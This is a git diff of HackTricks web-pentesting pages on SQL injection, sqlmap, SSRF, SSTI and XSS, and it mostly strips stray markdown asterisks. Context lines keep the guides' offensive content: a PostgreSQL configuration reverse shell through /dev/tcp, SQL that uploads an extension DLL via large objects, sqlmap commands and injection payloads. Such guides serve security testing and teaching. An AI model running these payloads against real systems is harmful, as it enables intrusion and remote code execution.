a/pentesting-web/sql-injection/mysql-injection/README.md b/pentesting-web/sql-injection/mysql-injection/README.md index d67c9ae1..297732e8 100644 --- a/pentesting-web/sql-injection/mysql-injection/README.md +++ b/pentesting-web/sql-injection/mysql-injection/README.md 
@@ -1,6 +1,6 @@ # MySQL injection -**This is a basic flow of how to confirm and perform a basic MySQL Injection. For more information go to:** [**https://github.com/carlospolop-forks/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md**](https://github.com/carlospolop-forks/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md)**** +**This is a basic flow of how to confirm and perform a basic MySQL Injection. For more information go to:** [**https://github.com/carlospolop-forks/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md**](https://github.com/carlospolop-forks/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md) ## Comments @@ -85,7 +85,7 @@ SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges * `SELECT LEFT(version(),1...lenght(version()))='asd'...` * `SELECT INSTR('foobarbar', 'fo...')=1` -## Detect number of columns +## Detect number of columns Using a simple ORDER diff --git a/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md b/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md index 38be1c25..a03dc491 100644 --- a/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md +++ b/pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md @@ -1,6 +1,6 @@ # Mysql SSRF -**Post copied from** [**https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#mysqlmariadbpercona**](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#mysqlmariadbpercona)**** +**Post copied from** [**https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#mysqlmariadbpercona**](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#mysqlmariadbpercona) ### Using LOAD\_FILE/LOAD DATA/LOAD XML diff --git a/pentesting-web/sql-injection/oracle-injection.md b/pentesting-web/sql-injection/oracle-injection.md index bf95b6e6..6b6bb833 100644 
--- a/pentesting-web/sql-injection/oracle-injection.md +++ b/pentesting-web/sql-injection/oracle-injection.md @@ -2,7 +2,7 @@ ## SSRF -**Information copied from** [**https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#oracle**](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#oracle)**** +**Information copied from** [**https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#oracle**](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#oracle) Using Oracle to do Out of Band HTTP and DNS requests is well documented but as a means of exfiltrating SQL data in injections. We can always modify these techniques/functions to do other SSRF/XSPA. diff --git a/pentesting-web/sql-injection/postgresql-injection/README.md b/pentesting-web/sql-injection/postgresql-injection/README.md index 812df601..e64c8337 100644 --- a/pentesting-web/sql-injection/postgresql-injection/README.md +++ b/pentesting-web/sql-injection/postgresql-injection/README.md 
@@ -1,21 +1,21 @@ # PostgreSQL injection -**This page aims to explain different tricks that could help you to exploit a SQLinjection found in a postgresql database and to compliment the tricks you can find on** [**https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md)\*\*\*\* +**This page aims to explain different tricks that could help you to exploit a SQLinjection found in a postgresql database and to compliment the tricks you can find on** [**https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md) ## Network Interaction - Privilege Escalation, Port Scanner, NTLM challenge response disclosure & Exfiltration **`dblink`** is a **PostgreSQL module** that offers several interesting options from the attacker point of view. It can be used to **connect to other PostgreSQL instances** of perform **TCP connections**.\ **These functionalities** along with the **`COPY FROM`** functionality can be used to **escalate privileges**, perform **port scanning** or grab **NTLM challenge responses**.\ -[**You can read here how to perform these attacked.**](network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md)\*\*\*\* +[**You can read here how to perform these attacked.**](network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md) ### **Exfiltration example using dblink and large objects** -You can [**read this example**](dblink-lo\_import-data-exfiltration.md) **\*\*to see a CTF example of** how to load data inside large objects and then exfiltrate the content of large objects inside the username\*\* of the function `dblink_connect`. 
+You can [**read this example**](dblink-lo\_import-data-exfiltration.md) to see a CTF example of** how to load data inside large objects and then exfiltrate the content of large objects inside the username** of the function `dblink_connect`. ## PL/pgSQL password bruteforce PL/pgSQL, as a **fully featured programming language**, allows much more procedural control than SQL, including the **ability to use loops and other control structures**. SQL statements and triggers can call functions created in the PL/pgSQL language.\ -**You can abuse this language in order to ask PostgreSQL to brute-force the users credentials.** [**Read this to learn how.**](pl-pgsql-password-bruteforce.md)\*\*\*\* +**You can abuse this language in order to ask PostgreSQL to brute-force the users credentials.** [**Read this to learn how.**](pl-pgsql-password-bruteforce.md) ## File-system actions @@ -40,7 +40,7 @@ A very important limitation of this technique is that **`copy` cannot be used to ### **Binary files upload** However, there are **other techniques to upload big binary files**.\ -[**Read this page to learn how to do it.**](big-binary-files-upload-postgresql.md)\*\*\*\* +[**Read this page to learn how to do it.**](big-binary-files-upload-postgresql.md) ## RCE @@ -67,7 +67,7 @@ More information about this vulnerability [**here**](https://medium.com/greenwol ### RCE with PostgreSQL extensions Once you have **learned** from the previous post **how to upload binary files** you could try obtain **RCE uploading a postgresql extension and loading it**.\ -[**Lear how to abuse this functionality reading this post.**](rce-with-postgresql-extensions.md)\*\*\*\* +[**Lear how to abuse this functionality reading this post.**](rce-with-postgresql-extensions.md) ### PostgreSQL configuration file RCE 
@@ -86,7 +86,7 @@ Then, an attacker will need to: 1. **Dump private key** from the server 2. **Encrypt** downloaded private key: 1. `rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key` -3. **Overwrite** +3. **Overwrite** 4. **Dump** the current postgresql **configuration** 5. **Overwrite** the **configuration** with the mentioned attributes configuration: 1. `ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'` diff --git a/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md b/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md index 1c04f56a..4d6b551c 100644 --- a/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md +++ b/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md @@ -26,7 +26,7 @@ When exploiting this remember that you have to send **chunks of 2KB clear-text b Also, debugging the process you can see the contents of the large objects created with: ```sql - select loid, pageno, encode(data, 'escape') from pg_largeobject; + select loid, pageno, encode(data, 'escape') from pg_largeobject; ``` ## Using lo\_creat & Base64 @@ -83,7 +83,7 @@ update pg_largeobject set data=decode('', 'hex') where loid=173454 and page update pg_largeobject set data=decode('', 'hex') where loid=173454 and pageno=3; ``` -The HEX must be just the hex (without `0x` or `\x`), example: +The HEX must be just the hex (without `0x` or `\x`), example: ```sql update pg_largeobject set data=decode('68656c6c6f', 'hex') where loid=173454 and pageno=0; @@ -92,7 +92,7 @@ update pg_largeobject set data=decode('68656c6c6f', 'hex') where loid=173454 and Finally, export the data to a file and delete the large object: ```sql - select lo_export(173454, 'C:\\path\to\pg_extension.dll'); + select lo_export(173454, 'C:\\path\to\pg_extension.dll'); select lo_unlink(173454); -- deletes large object with OID 173454 ``` 
diff --git a/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md b/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md index bf9d1c0e..4d86c68d 100644 --- a/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md +++ b/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md @@ -4,7 +4,7 @@ ## **Preparing the exfiltration server/**Asynchronous SQL Injection -**Extracted from:** [**https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md**](https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md)**** +**Extracted from:** [**https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md**](https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md) Because the `pg_sleep` also doesn't cause delay, we can safely assume if query execution occurs in the background or asynchronously. diff --git a/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md b/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md index a97e196f..348591a8 100644 --- a/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md +++ b/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md 
@@ -6,7 +6,7 @@ PostgreSQL is designed to be easily extensible. For this reason, extensions load Extensions are modules that supply extra functions, operators, or types. They are libraries written in C.\ From PostgreSQL > 8.1 the extension libraries must be compiled with a especial header or PostgreSQL will refuse to execute them. -Also, keep in mind that **if you don't know how to** [**upload files to the victim abusing PostgreSQL you should read this post.**](big-binary-files-upload-postgresql.md)**** +Also, keep in mind that **if you don't know how to** [**upload files to the victim abusing PostgreSQL you should read this post.**](big-binary-files-upload-postgresql.md) ### RCE in Linux diff --git a/pentesting-web/sql-injection/sqlmap/README.md b/pentesting-web/sql-injection/sqlmap/README.md index ab72b2a5..72a19dd7 100644 --- a/pentesting-web/sql-injection/sqlmap/README.md +++ b/pentesting-web/sql-injection/sqlmap/README.md @@ -135,7 +135,7 @@ python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wis sqlmap -r 1.txt -dbms MySQL -second-order "http:///joomla/administrator/index.php" -D "joomla" -dbs ``` -****[**Read this post** ](second-order-injection-sqlmap.md)**about how to perform simple and complex second order injections with sqlmap.** +[**Read this post** ](second-order-injection-sqlmap.md)**about how to perform simple and complex second order injections with sqlmap.** ## Customizing Injection diff --git a/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md b/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md index 0436cab9..fff249f5 100644 --- a/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md +++ b/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md 
@@ -1,7 +1,7 @@ # Second Order Injection - SQLMap **SQLMap can exploit Second Order SQLis.**\ -****You need to provide: +You need to provide: * The **request** where the **sqlinjection payload** is going to be saved * The **request** where the **payload** will be **executed** diff --git a/pentesting-web/ssrf-server-side-request-forgery/README.md b/pentesting-web/ssrf-server-side-request-forgery/README.md index 5bd02715..f73c6bdf 100644 --- a/pentesting-web/ssrf-server-side-request-forgery/README.md +++ b/pentesting-web/ssrf-server-side-request-forgery/README.md @@ -10,10 +10,10 @@ The first thing you need to do is to capture a SSRF interaction provoked by you. * **Burpcollab** * [**pingb**](http://pingb.in) -* ****[**canarytokens**](https://canarytokens.org/generate#)**** -* ****[**interractsh**](https://github.com/projectdiscovery/interactsh)**** -* ****[**http://webhook.site**](http://webhook.site)**** -* [**https://github.com/teknogeek/ssrf-sheriff**](https://github.com/teknogeek/ssrf-sheriff)**** +* [**canarytokens**](https://canarytokens.org/generate#) +* [**interractsh**](https://github.com/projectdiscovery/interactsh) +* [**http://webhook.site**](http://webhook.site) +* [**https://github.com/teknogeek/ssrf-sheriff**](https://github.com/teknogeek/ssrf-sheriff) ## Whitelisted Domains Bypass @@ -224,7 +224,7 @@ Several known platforms contains or has contained SSRF vulnerabilities, check th ## Tools -### ****[**SSRFMap**](https://github.com/swisskyrepo/SSRFmap)**** +### [**SSRFMap**](https://github.com/swisskyrepo/SSRFmap) Tool to detect and exploit SSRF vulnerabilities diff --git a/pentesting-web/ssti-server-side-template-injection/README.md b/pentesting-web/ssti-server-side-template-injection/README.md index c618ec76..0b96a229 100644 --- a/pentesting-web/ssti-server-side-template-injection/README.md +++ b/pentesting-web/ssti-server-side-template-injection/README.md 
@@ -5,11 +5,11 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} 
@@ -354,7 +354,7 @@ Payload: {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstanc ### Expression Language - EL (Java) * `${"aaaa"}` - "aaaa" -* `${99999+1}` - 100000. +* `${99999+1}` - 100000. * `#{7*7}` - 49 * `${{7*7}}` - 49 * `${{request}}, ${{session}}, {{faceContext}}` @@ -871,7 +871,7 @@ The way to confirm that the template engine used in the backed is Go you can use #### XSS exploitation -If the server is **using the text/template** package, XSS is very easy to achieve by **simply** providing your **payload** as input. However, that is **not the case with html/template** as itHTMLencodes the response: `{{""}}` **** --> `<script>alert(1)</script>` +If the server is **using the text/template** package, XSS is very easy to achieve by **simply** providing your **payload** as input. However, that is **not the case with html/template** as itHTMLencodes the response: `{{""}}` --> `<script>alert(1)</script>` However, Go allows to **DEFINE** a whole **template** and then **later call it**. The payload will be something like:\ `{{define "T1"}}{{end}} {{template "T1"}}` @@ -890,7 +890,7 @@ func (p Person) Secret (test string) string { } ``` -#### More information +#### More information * [https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html](https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html) * [https://www.onsecurity.io/blog/go-ssti-method-research/](https://www.onsecurity.io/blog/go-ssti-method-research/) diff --git a/pentesting-web/ssti-server-side-template-injection/el-expression-language.md b/pentesting-web/ssti-server-side-template-injection/el-expression-language.md index fe5e17ac..25ebfed3 100644 --- a/pentesting-web/ssti-server-side-template-injection/el-expression-language.md +++ b/pentesting-web/ssti-server-side-template-injection/el-expression-language.md 
@@ -24,9 +24,9 @@ Depending on the **EL version** some **features** might be **On** or **Off** and Download from the [**Maven**](https://mvnrepository.com) repository the jar files: -* `commons-lang3-3.9.jar` +* `commons-lang3-3.9.jar` * `spring-core-5.2.1.RELEASE.jar` -* `commons-logging-1.2.jar` +* `commons-logging-1.2.jar` * `spring-expression-5.2.1.RELEASE.jar` And create a the following `Main.java` file: diff --git a/pentesting-web/unicode-normalization-vulnerability.md b/pentesting-web/unicode-normalization-vulnerability.md index 6ea72a30..2d4c84e5 100644 --- a/pentesting-web/unicode-normalization-vulnerability.md +++ b/pentesting-web/unicode-normalization-vulnerability.md @@ -84,6 +84,6 @@ Notice that for example the first Unicode character purposed can be sent as: `%e **Other references:** -* ****[**https://labs.spotify.com/2013/06/18/creative-usernames/**](https://labs.spotify.com/2013/06/18/creative-usernames/)**** -* ****[**https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work**](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work)**** -* ****[**https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html)**** +* [**https://labs.spotify.com/2013/06/18/creative-usernames/**](https://labs.spotify.com/2013/06/18/creative-usernames/) +* [**https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work**](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work) +* [**https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html) diff --git a/pentesting-web/web-vulnerabilities-methodology.md b/pentesting-web/web-vulnerabilities-methodology.md index 0ea55023..0e61abcf 100644 --- a/pentesting-web/web-vulnerabilities-methodology.md 
+++ b/pentesting-web/web-vulnerabilities-methodology.md 
@@ -8,40 +8,40 @@ In every pentest web there is **several hidden and obvious places that might be Nowadays **web** **applications** usually **uses** some kind of **intermediary** **proxies**, those may be (ab)used to exploit vulnerabilities. These vulnerabilities need a vulnerable proxy to be in place, but they usually also need some extra vulnerability in the backend. {% endhint %} -* [ ] [**Abusing hop-by-hop headers**](abusing-hop-by-hop-headers.md)**** -* [ ] ****[**Cache Poisoning/Cache Deception**](cache-deception.md)**** -* [ ] ****[**HTTP Request Smuggling**](http-request-smuggling/)**** -* [ ] ****[**H2C Smuggling**](h2c-smuggling.md)**** -* [ ] ****[**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md)**** -* [ ] ****[**Uncovering Cloudflare**](../pentesting/pentesting-web/uncovering-cloudflare.md)**** -* [ ] ****[**XSLT Server Side Injection**](xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md)**** +* [ ] [**Abusing hop-by-hop headers**](abusing-hop-by-hop-headers.md) +* [ ] [**Cache Poisoning/Cache Deception**](cache-deception.md) +* [ ] [**HTTP Request Smuggling**](http-request-smuggling/) +* [ ] [**H2C Smuggling**](h2c-smuggling.md) +* [ ] [**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md) +* [ ] [**Uncovering Cloudflare**](../pentesting/pentesting-web/uncovering-cloudflare.md) +* [ ] [**XSLT Server Side Injection**](xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md) ## **User input** {% hint style="info" %} - Most of the web applications will **allow users to input some data that will be processed later.**\ -****Depending on the structure of the data the server is expecting some vulnerabilities may or may not apply. 
+Most of the web applications will **allow users to input some data that will be processed later.**\ +Depending on the structure of the data the server is expecting some vulnerabilities may or may not apply. {% endhint %} ### **Reflected Values** If the introduced data may somehow being reflected in the response, the page might be vulnerable to several issues. -* [ ] [**Client Side Template Injection**](client-side-template-injection-csti.md)**** -* [ ] ****[**Command Injection**](command-injection.md)**** -* [ ] ****[**CRLF**](crlf-0d-0a.md)**** -* [ ] ****[**Dangling Markup**](dangling-markup-html-scriptless-injection.md)**** -* [ ] [**File Inclusion/Path Traversal**](file-inclusion/)**** -* [ ] [**Open Redirect**](open-redirect.md)**** -* [ ] ****[**Prototype Pollution to XSS**](deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)**** -* [ ] [**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md)**** -* [ ] [**Server Side Request Forgery**](ssrf-server-side-request-forgery/)**** -* [ ] [**Server Side Template Injection**](ssti-server-side-template-injection/)**** -* [ ] [**Reverse Tab Nabbing**](reverse-tab-nabbing.md)**** -* [ ] [**XSLT Server Side Injection**](xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md)**** -* [ ] [**XSS**](xss-cross-site-scripting/)**** -* [ ] ****[**XSSI**](xssi-cross-site-script-inclusion.md)**** -* [ ] ****[**XS-Search**](xs-search.md)**** +* [ ] [**Client Side Template Injection**](client-side-template-injection-csti.md) +* [ ] [**Command Injection**](command-injection.md) +* [ ] [**CRLF**](crlf-0d-0a.md) +* [ ] [**Dangling Markup**](dangling-markup-html-scriptless-injection.md) +* [ ] [**File Inclusion/Path Traversal**](file-inclusion/) +* [ ] [**Open Redirect**](open-redirect.md) +* [ ] [**Prototype Pollution to XSS**](deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss) +* [ ] 
[**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md) +* [ ] [**Server Side Request Forgery**](ssrf-server-side-request-forgery/) +* [ ] [**Server Side Template Injection**](ssti-server-side-template-injection/) +* [ ] [**Reverse Tab Nabbing**](reverse-tab-nabbing.md) +* [ ] [**XSLT Server Side Injection**](xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md) +* [ ] [**XSS**](xss-cross-site-scripting/) +* [ ] [**XSSI**](xssi-cross-site-script-inclusion.md) +* [ ] [**XS-Search**](xs-search.md) Some of the mentioned vulnerabilities requires special conditions, others just require the content to be reflected. You can find some interesting polygloths to test quickly the vulnerabilities in: 
@@ -53,52 +53,52 @@ Some of the mentioned vulnerabilities requires special conditions, others just r If the functionality may be used to search some kind of data inside the backend, maybe you can (ab)use it to search arbitrary data. -* [ ] [**File Inclusion/Path Traversal**](file-inclusion/)**** -* [ ] ****[**NoSQL Injection**](nosql-injection.md)**** -* [ ] ****[**LDAP Injection**](ldap-injection.md)**** +* [ ] [**File Inclusion/Path Traversal**](file-inclusion/) +* [ ] [**NoSQL Injection**](nosql-injection.md) +* [ ] [**LDAP Injection**](ldap-injection.md) * [ ] [**ReDoS**](regular-expression-denial-of-service-redos.md) -* [ ] [**SQL Injection**](sql-injection/)**** -* [ ] [**XAPTH Injection**](xpath-injection.md)**** +* [ ] [**SQL Injection**](sql-injection/) +* [ ] [**XAPTH Injection**](xpath-injection.md) ### **Forms, WebSockets and PostMsgs** When websocket, post message or a form allows user to perform actions vulnerabilities may arise. -* [ ] [**Cross Site Request Forgery**](csrf-cross-site-request-forgery.md)**** -* [ ] [**Cross-site WebSocket hijacking (CSWSH)**](cross-site-websocket-hijacking-cswsh.md)**** -* [ ] ****[**PostMessage Vulnerabilities**](postmessage-vulnerabilities.md)**** +* [ ] [**Cross Site Request Forgery**](csrf-cross-site-request-forgery.md) +* [ ] [**Cross-site WebSocket hijacking (CSWSH)**](cross-site-websocket-hijacking-cswsh.md) +* [ ] [**PostMessage Vulnerabilities**](postmessage-vulnerabilities.md) ### **HTTP Headers** Depending on the HTTP headers given by the web server some vulnerabilities might be present. 
-* [ ] [**Clickjacking**](clickjacking.md)**** -* [ ] ****[**Content Security Policy bypass**](content-security-policy-csp-bypass.md)**** -* [ ] ****[**Cookies Hacking**](hacking-with-cookies/)**** -* [ ] ****[**CORS - Misconfigurations & Bypass**](cors-bypass.md)**** +* [ ] [**Clickjacking**](clickjacking.md) +* [ ] [**Content Security Policy bypass**](content-security-policy-csp-bypass.md) +* [ ] [**Cookies Hacking**](hacking-with-cookies/) +* [ ] [**CORS - Misconfigurations & Bypass**](cors-bypass.md) ### **Bypasses** There are several specific functionalities were some workarounds might be useful to bypass them -* [ ] ****[**2FA/OPT Bypass**](2fa-bypass.md)**** -* [ ] ****[**Bypass Payment Process**](bypass-payment-process.md)**** -* [ ] ****[**Captcha Bypass**](captcha-bypass.md)**** -* [ ] ****[**Login Bypass**](login-bypass/)**** -* [ ] ****[**Race Condition**](race-condition.md)**** -* [ ] ****[**Rate Limit Bypass**](rate-limit-bypass.md)**** -* [ ] ****[**Reset Forgotten Password Bypass**](reset-password.md)**** -* [ ] ****[**Registration Vulnerabilities**](registration-vulnerabilities.md)**** +* [ ] [**2FA/OPT Bypass**](2fa-bypass.md) +* [ ] [**Bypass Payment Process**](bypass-payment-process.md) +* [ ] [**Captcha Bypass**](captcha-bypass.md) +* [ ] [**Login Bypass**](login-bypass/) +* [ ] [**Race Condition**](race-condition.md) +* [ ] [**Rate Limit Bypass**](rate-limit-bypass.md) +* [ ] [**Reset Forgotten Password Bypass**](reset-password.md) +* [ ] [**Registration Vulnerabilities**](registration-vulnerabilities.md) ### **Structured objects / Specific functionalities** Some functionalities will require the **data to be structured on a very specific format** (like a language serialized object or a XML). 
Therefore, it's more easy to identify is the application might be vulnerable as it needs to be processing that kind of data.\ -Some **specific functionalities** my be also vulnerable if a **specific format of the input is used** (like Email Header Injections). +Some **specific functionalities** my be also vulnerable if a **specific format of the input is used** (like Email Header Injections). -* [ ] ****[**Deserialization**](deserialization/)**** -* [ ] ****[**Email Header Injection**](email-header-injection.md)**** -* [ ] ****[**JWT Vulnerabilities**](hacking-jwt-json-web-tokens.md)**** -* [ ] [**XML External Entity**](xxe-xee-xml-external-entity.md)**** +* [ ] [**Deserialization**](deserialization/) +* [ ] [**Email Header Injection**](email-header-injection.md) +* [ ] [**JWT Vulnerabilities**](hacking-jwt-json-web-tokens.md) +* [ ] [**XML External Entity**](xxe-xee-xml-external-entity.md) ### Files 
@@ -106,21 +106,21 @@ Functionalities that allow to upload files might be vulnerable to several issues Functionalities that generates files including user input might execute unexpected code.\ Users that open files uploaded by users or automatically generated including user input might be compromised. -* [ ] [**File Upload**](file-upload/)**** -* [ ] ****[**Formula Injection**](formula-injection.md)**** -* [ ] ****[**PDF Injection**](xss-cross-site-scripting/pdf-injection.md)**** -* [ ] ****[**Server Side XSS**](xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)**** +* [ ] [**File Upload**](file-upload/) +* [ ] [**Formula Injection**](formula-injection.md) +* [ ] [**PDF Injection**](xss-cross-site-scripting/pdf-injection.md) +* [ ] [**Server Side XSS**](xss-cross-site-scripting/server-side-xss-dynamic-pdf.md) ### **External Identity Management** -* [ ] ****[**OAUTH to Account takeover**](oauth-to-account-takeover.md)**** -* [ ] ****[**SAML Attacks**](saml-attacks/)**** +* [ ] [**OAUTH to Account takeover**](oauth-to-account-takeover.md) +* [ ] [**SAML Attacks**](saml-attacks/) ### **Other Helpful Vulnerabilities** This vulnerabilities might help to exploit other vulnerabilities. -* [ ] [**Domain/Subdomain takeover**](domain-subdomain-takeover.md)**** -* [ ] ****[**IDOR**](idor.md)**** -* [ ] [**Parameter Pollution**](parameter-pollution.md)**** -* [ ] ****[**Unicode Normalization vulnerability**](unicode-normalization-vulnerability.md)**** +* [ ] [**Domain/Subdomain takeover**](domain-subdomain-takeover.md) +* [ ] [**IDOR**](idor.md) +* [ ] [**Parameter Pollution**](parameter-pollution.md) +* [ ] [**Unicode Normalization vulnerability**](unicode-normalization-vulnerability.md) diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md index 61a5dac8..0b2988ba 100644 --- a/pentesting-web/xss-cross-site-scripting/README.md +++ b/pentesting-web/xss-cross-site-scripting/README.md 
@@ -53,7 +53,7 @@ If your input is reflected inside the value of the attribute of a tag you could ### Inside JavaScript code -In this case your input is reflected between **``** tags of a HTML page, inside a \*\*`.js`\*\*file or inside an attribute using **`javascript:`** protocol: +In this case your input is reflected between **``** tags of a HTML page, inside a **`.js`**file or inside an attribute using **`javascript:`** protocol: * If reflected between **``** tags, even if your input if inside any kind of quotes, you can try to inject `` and escape from this context. This works because the **browser will first parse the HTML tags** and then the content, therefore, it won't notice that your injected `` tag is inside the HTML code. * If reflected **inside a JS string** and the last trick isn't working you would need to **exit** the string, **execute** your code and **reconstruct** the JS code (if there is any error, it won't be executed: @@ -91,7 +91,7 @@ Some **examples**: When your input is reflected **inside the HTML page** or you can escape and inject HTML code in this context the **first** thing you need to do if check if you can abuse `<` to create new tags: Just try to **reflect** that **char** and check if it's being **HTML encoded** or **deleted** of if it is **reflected without changes**. **Only in the last case you will be able to exploit this case**.\ For this cases also **keep in mind** [**Client Side Template Injection**](../client-side-template-injection-csti.md)**.**\ -_**Note: A HTML comment can be closed using\*\*\*\***** ****`-->`**** ****or \*\*\*\*****`--!>`**_ +_**Note: A HTML comment can be closed using `-->` or `--!>`**_ In this case and if no black/whitelisting is used, you could use payloads like: 
@@ -315,7 +315,7 @@ _**In this case the HTML encoding and the Unicode encoding trick from the previo ``` -Moreover, there is another **nice trick** for these cases\*\*: Even if your input inside `javascript:...` is being URL encoded, it will be URL decoded before it's executed.\*\* So, if you need to **escape** from the **string** using a **single quote** and you see that **it's being URL encoded**, remember that **it doesn't matter,** it will be **interpreted** as a **single quote** during the **execution** time. +Moreover, there is another **nice trick** for these cases**: Even if your input inside `javascript:...` is being URL encoded, it will be URL decoded before it's executed.** So, if you need to **escape** from the **string** using a **single quote** and you see that **it's being URL encoded**, remember that **it doesn't matter,** it will be **interpreted** as a **single quote** during the **execution** time. ```javascript '-alert(1)-' diff --git a/pentesting-web/xss-cross-site-scripting/dom-xss.md b/pentesting-web/xss-cross-site-scripting/dom-xss.md index 0ed17e7a..66084c81 100644 --- a/pentesting-web/xss-cross-site-scripting/dom-xss.md +++ b/pentesting-web/xss-cross-site-scripting/dom-xss.md @@ -13,7 +13,7 @@ Fundamentally, DOM-based vulnerabilities arise when a website **passes data from a source to a sink**, which then handles the data in an unsafe way in the context of the client's session. {% hint style="info" %} -**You can find a more updated list of sources and sinks in** [**https://github.com/wisec/domxsswiki/wiki**](https://github.com/wisec/domxsswiki/wiki)**** +**You can find a more updated list of sources and sinks in** [**https://github.com/wisec/domxsswiki/wiki**](https://github.com/wisec/domxsswiki/wiki) {% endhint %} **Common sources:** 
